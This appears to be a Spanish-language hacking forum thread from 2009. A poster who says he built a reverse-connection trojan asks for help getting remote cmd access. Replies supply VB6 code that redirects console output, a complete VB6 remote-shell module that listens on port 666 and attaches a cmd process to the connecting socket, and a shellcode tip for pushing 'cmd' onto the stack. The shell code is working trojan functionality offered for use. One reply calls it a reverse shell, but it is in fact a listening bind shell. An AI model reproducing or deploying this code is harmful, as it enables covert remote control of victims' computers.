hola
hace unos años cree un troyano de multiconexion inversa
ahora lo retome ya que lo quiero volver a usar y estoy en proceso para poder enviar comandos a la cmd remota y poder volver a recibir lo que pasa (EJ: pongo dir C:\ y me devuelve el resultado, enlistando los archivos en C:\)
para esto encontre este codigo de cmd pipe
'Redirects output from console program to textbox.
'Requires two textboxes and one command button.
'Set MultiLine property of Text2 to true.
'
'Original bcx version of this program was made by
' dl <dl@tks.cjb.net>
'VB port was made by Jernej Simoncic <jernej@isg.si>
'Visit Jernejs site at http://www2.arnes.si/~sopjsimo/
'
'Note: don't run plain DOS programs with this example
'under Windows 95,98 and ME, as the program freezes when
'execution of program is finnished.
Option Explicit
Private Declare Function CreatePipe Lib "kernel32" (phReadPipe As Long, phWritePipe As Long, lpPipeAttributes As SECURITY_ATTRIBUTES, ByVal nSize As Long) As Long
Private Declare Sub GetStartupInfo Lib "kernel32" Alias "GetStartupInfoA" (lpStartupInfo As STARTUPINFO)
Private Declare Function CreateProcess Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDriectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
Private Declare Function SetWindowText Lib "user32" Alias "SetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare Function ReadFile Lib "kernel32" (ByVal hFile As Long, lpBuffer As Any, ByVal nNumberOfBytesToRead As Long, lpNumberOfBytesRead As Long, lpOverlapped As Any) As Long
Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private Type SECURITY_ATTRIBUTES
nLength As Long
lpSecurityDescriptor As Long
bInheritHandle As Long
End Type
Private Type PROCESS_INFORMATION
hProcess As Long
hThread As Long
dwProcessId As Long
dwThreadId As Long
End Type
Private Type STARTUPINFO
cb As Long
lpReserved As Long
lpDesktop As Long
lpTitle As Long
dwX As Long
dwY As Long
dwXSize As Long
dwYSize As Long
dwXCountChars As Long
dwYCountChars As Long
dwFillAttribute As Long
dwFlags As Long
wShowWindow As Integer
cbReserved2 As Integer
lpReserved2 As Byte
hStdInput As Long
hStdOutput As Long
hStdError As Long
End Type
Private Type OVERLAPPED
ternal As Long
ternalHigh As Long
offset As Long
OffsetHigh As Long
hEvent As Long
End Type
Private Const STARTF_USESHOWWINDOW = &H1
Private Const STARTF_USESTDHANDLES = &H100
Private Const SW_HIDE = 0
Private Const EM_SETSEL = &HB1
Private Const EM_REPLACESEL = &HC2
Private Sub Command1_Click()
Command1.Enabled = False
Redirect Text1.Text, Text2
Command1.Enabled = True
End Sub
Private Sub Form_Load()
Text1.Text = "ping"
End Sub
Private Sub Form_QueryUnload(Cancel As Integer, UnloadMode As Integer)
If Command1.Enabled = False Then Cancel = True
End Sub
Sub Redirect(cmdLine As String, objTarget As Object)
Dim i%, t$
Dim pa As SECURITY_ATTRIBUTES
Dim pra As SECURITY_ATTRIBUTES
Dim tra As SECURITY_ATTRIBUTES
Dim pi As PROCESS_INFORMATION
Dim sui As STARTUPINFO
Dim hRead As Long
Dim hWrite As Long
Dim bRead As Long
Dim lpBuffer(1024) As Byte
pa.nLength = Len(pa)
pa.lpSecurityDescriptor = 0
pa.bInheritHandle = True
pra.nLength = Len(pra)
tra.nLength = Len(tra)
If CreatePipe(hRead, hWrite, pa, 0) <> 0 Then
sui.cb = Len(sui)
GetStartupInfo sui
sui.hStdOutput = hWrite
sui.hStdError = hWrite
sui.dwFlags = STARTF_USESHOWWINDOW Or STARTF_USESTDHANDLES
sui.wShowWindow = SW_HIDE
If CreateProcess(vbNullString, cmdLine, pra, tra, True, 0, Null, vbNullString, sui, pi) <> 0 Then
SetWindowText objTarget.hwnd, ""
Do
Erase lpBuffer()
If ReadFile(hRead, lpBuffer(0), 1023, bRead, ByVal 0&) Then
SendMessage objTarget.hwnd, EM_SETSEL, -1, 0
SendMessage objTarget.hwnd, EM_REPLACESEL, False, lpBuffer(0)
DoEvents
Else
CloseHandle pi.hThread
CloseHandle pi.hProcess
Exit Do
End If
CloseHandle hWrite
Loop
CloseHandle hRead
End If
End If
End Subpara enviar comandos como cd o dir hay que anteponer un "cmd /k" (Ej: cmd /k dir C:\) no me pregunten por que (si alguien me puede explicar porque hay que hacerlo se agradece jajaja)
pero bueno el problema es que al enviar un comando como un dir o cd, me sale este error:
CitarError '9' en tiempo de ejecucion:
el subindice esta fuera del intervalo
ayuda porfavor! gracias de antemano
Hay una manera de hacer esto correctamente y es conectar el stdio a un socket, despues si tengo un rato lo hago y lo posteo.
ok se agradeceria mucho!
alguna otra idea?
gracias ;D
como saber que timer es el que esta "fuera del intervalo"? y que significa que esta fuera del intervalo? perdon si es algo noob mi pregunta pero hace mucho que no toco el vb 6
CitarError '9' en tiempo de ejecucion:
el subindice esta fuera del intervalo
gracias :)
en que linea exactamente se produce el error?
Bien, aca esta el ejemplo
'---------------------------------------------------------------------------------------
' Module : mMS
' DateTime : 12/13/2009 20:16
' Author : Cobein
' Mail : cobein27@hotmail.com
' WebPage : http://www.advancevb.com.ar
' Purpose : Remote shell
' Usage : At your own risk
' Requirements: None
' Distribution: You can freely use this code in your own
' applications, but you may not reproduce
' or publish this code on any web site,
' online service, or distribute as source
' on any media without express permission.
'
' Reference : NGS - Writing small shellcode paper
'
' History : 12/13/2009 First Cut....................................................
'---------------------------------------------------------------------------------------
Option Explicit
Private Const INFINITE As Long = &HFFFF
Private Const SOCK_STREAM As Long = 1
Private Const AF_INET As Long = 2
Private Const IPPROTO_TCP As Long = 6
Private Const STARTF_USESTDHANDLES As Long = &H100
Private Const STARTF_USESHOWWINDOW As Long = &H1
Private Const WSADESCRIPTION_LEN As Long = 257
Private Const WSASYS_STATUS_LEN As Long = 129
Public Type WSAData
wVersion As Integer
wHighVersion As Integer
szDescription As String * WSADESCRIPTION_LEN
szSystemStatus As String * WSASYS_STATUS_LEN
iMaxSockets As Integer
iMaxUdpDg As Integer
lpVendorInfo As Long
End Type
Public Type sockaddr_in
sin_family As Integer
sin_port As Integer
sin_addr As Long
sin_zero(1 To 8) As Byte
End Type
Private Type SECURITY_ATTRIBUTES
nLength As Long
lpSecurityDescriptor As Long
bInheritHandle As Long
End Type
Private Type PROCESS_INFORMATION
hProcess As Long
hThread As Long
dwProcessId As Long
dwThreadId As Long
End Type
Private Type STARTUPINFO
cb As Long
lpReserved As String
lpDesktop As String
lpTitle As String
dwX As Long
dwY As Long
dwXSize As Long
dwYSize As Long
dwXCountChars As Long
dwYCountChars As Long
dwFillAttribute As Long
dwFlags As Long
wShowWindow As Integer
cbReserved2 As Integer
lpReserved2 As Byte
hStdInput As Long
hStdOutput As Long
hStdError As Long
End Type
Private Declare Function WSAStartup Lib "ws2_32.dll" (ByVal wVR As Long, lpWSAD As WSAData) As Long
Private Declare Function WSACleanup Lib "ws2_32.dll" () As Long
Private Declare Function bind Lib "ws2_32.dll" (ByVal s As Long, ByRef name As sockaddr_in, ByRef namelen As Long) As Long
Private Declare Function listen Lib "ws2_32.dll" (ByVal s As Long, ByVal backlog As Long) As Long
Private Declare Function accept Lib "ws2_32.dll" (ByVal s As Long, ByRef addr As sockaddr_in, ByRef addrlen As Long) As Long
Private Declare Function CreateProcessA Lib "kernel32" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As SECURITY_ATTRIBUTES, lpThreadAttributes As SECURITY_ATTRIBUTES, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDriectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
Private Declare Function WaitForSingleObject Lib "kernel32" (ByVal hHandle As Long, ByVal dwMilliseconds As Long) As Long
Private Declare Function htons Lib "wsock32.dll" (ByVal hostshort As Long) As Integer
Private Declare Function WSASocketA Lib "ws2_32.dll" (ByVal af As Long, ByVal lType As Long, ByVal protocol As Long, ByRef lpProtocolInfo As Any, ByRef g As Any, ByVal dwFlags As Long) As Long
Private Declare Function closesocket Lib "wsock32.dll" (ByVal s As Long) As Long
Public Sub Main()
Dim lSock As Long
Dim tSA As sockaddr_in
Dim tWD As WSAData
Dim lHandle As Long
Const PORT As Long = 666
If WSAStartup(&H101, tWD) = 0 Then
lSock = WSASocketA(AF_INET, SOCK_STREAM, IPPROTO_TCP, ByVal 0&, ByVal 0&, ByVal 0&)
If Not lSock = -1 Then
With tSA
.sin_family = 2
.sin_port = htons(PORT)
End With
If bind(lSock, tSA, Len(tSA)) = 0 Then
If listen(lSock, 0&) = 0 Then
lHandle = accept(lSock, tSA, Len(tSA))
Dim tSTARTUPINFO As STARTUPINFO
Dim tPROCESS_INFORMATION As PROCESS_INFORMATION
Dim tSECURITY_ATTRIBUTES As SECURITY_ATTRIBUTES
tSECURITY_ATTRIBUTES.nLength = Len(tSECURITY_ATTRIBUTES)
With tSTARTUPINFO
.cb = Len(tSTARTUPINFO)
.dwFlags = STARTF_USESTDHANDLES Or STARTF_USESHOWWINDOW
.hStdInput = lHandle
.hStdOutput = lHandle
.hStdError = lHandle
End With
If CreateProcessA(vbNullString, "cmd", _
tSECURITY_ATTRIBUTES, tSECURITY_ATTRIBUTES, True, 0, _
0&, CurDir, tSTARTUPINFO, tPROCESS_INFORMATION) Then
Call WaitForSingleObject(tPROCESS_INFORMATION.hProcess, INFINITE)
End If
End If
End If
Call closesocket(lHandle)
End If
Call WSACleanup
End If
End Sub
Algunas cosas para que tengan en cuenta.
1- el codigo se va a freezar a la espera de una conexión
2- hay muchas estructuras que se pueden obviar pero las deje pora que el ejemplo sea mas claro.
3- se pueden conectar usando telnet (open localhost 666) en Vista y no se si en 7 telnet no esta instalado por defecto.
Muy bonito el code ;D
Solo una cosa:
If CreateProcessA(vbNullString, "cmd", _
tSECURITY_ATTRIBUTES, tSECURITY_ATTRIBUTES, True, 0, _
0&, CurDir, tSTARTUPINFO, tPROCESS_INFORMATION) Then
Envez de 'cmd' creo que seria mejor '%COMSPEC%' ;)
Cita de: Karcrack en 14 Diciembre 2009, 16:59 PM
Muy bonito el code ;D
Solo una cosa:
If CreateProcessA(vbNullString, "cmd", _
tSECURITY_ATTRIBUTES, tSECURITY_ATTRIBUTES, True, 0, _
0&, CurDir, tSTARTUPINFO, tPROCESS_INFORMATION) Then
Envez de 'cmd' creo que seria mejor '%COMSPEC%' ;)
¿En que PC no seria cmd ? :xD
no entendi en absoluto lo qe postiaste :S
disculpa mi ignorancia soy newbie... pero qe es eso?
Cita de: YST en 14 Diciembre 2009, 20:23 PM
¿En que PC no seria cmd ? :xD
Cualquier version de W$ anterior a XP :P
De todos modos, variables de entorno ftw!!! :xD
Cita de: Karcrack en 15 Diciembre 2009, 19:56 PM
Cita de: YST en 14 Diciembre 2009, 20:23 PM
¿En que PC no seria cmd ? :xD
Cualquier version de W$ anterior a XP :P
De todos modos, variables de entorno ftw!!! :xD
En windows 2000 esta ;) y la api CreateProcess esta desde ese win.. entonces el codigo siempre es cmd ya que si no es ejecutado en un sistema luego de windows 2000 no funcionara ;)
Cita de: YST en 15 Diciembre 2009, 20:03 PM
En windows 2000 esta ;) y la api CreateProcess esta desde ese win.. entonces el codigo siempre es cmd ya que si no es ejecutado en un sistema luego de windows 2000 no funcionara ;)
En W$2000 se llama
command, no
cmd :-\
Citarcmd.exe es el intérprete de comandos en OS/2 y sistemas basados en Windows NT (incluyendo Windows 2000, Windows XP, Windows Server 2003, y Windows Vista).
http://es.wikipedia.org/wiki/Cmd_%28Windows%29
Entonces no esta en W7 :huh: :huh:
:laugh: :laugh: :laugh: :laugh:
Bueno, entonces pones la variable de entorno y punto! :¬¬ :¬¬
Cita de: Karcrack en 15 Diciembre 2009, 21:26 PM
Entonces no esta en W7 :huh: :huh:
:laugh: :laugh: :laugh: :laugh:
Bueno, entonces pones la variable de entorno y punto! :¬¬ :¬¬
No esta actualizado :¬¬
Por cierto la variable de entorno seria mas lenta :P
Vaaaaaale... tienes razon :¬¬ :¬¬
Minimum supported client Windows 2000 Professional
CreateProcessA/W esta a partir del W$ 2k... y a partir del W$ 2k se puede usar cmd... asi que... bueno, es mejor usar CMD directamente! :P
Ademas, es mas util para shellcodes, ya que puedes pushear la cadena en el stack con un solo DWORD! :silbar:
; \0,D,M,C
push $00646D63
:D
no entiendo nada :o
alguien me puede explicar como lo hago?
Cita de: hepy_92 en 18 Diciembre 2009, 14:26 PM
no entiendo nada :o
alguien me puede explicar como lo hago?
Lo que te posteo Cobein fue una preciosa Shell Inversa(Reverse Shell) :-* :xD
Si quieres mas info:
http://www.ngssoftware.com/research/papers/WritingSmallShellcode.pdf